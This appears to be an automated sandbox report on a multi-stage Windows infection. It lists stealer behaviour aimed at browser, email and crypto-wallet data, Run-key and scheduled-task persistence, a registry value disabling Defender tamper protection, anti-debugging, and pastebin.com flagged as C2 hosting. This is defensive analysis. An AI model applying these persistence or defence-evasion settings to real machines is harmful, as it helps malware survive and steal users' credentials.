Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\ProgramData\bcngpqs\ovql.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\be9629c306.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\be9629c306.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22e7923b7d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\22e7923b7d.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd3907672e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\dd3907672e.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\EX0eXUWS\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3d77cfb89.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\e3d77cfb89.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1590993906.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\1590993906.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\bcngpqs\ovql.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\bcngpqs\ovql.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857006042876473" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\bcngpqs\ovql.exe N/A
N/A N/A C:\ProgramData\bcngpqs\ovql.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
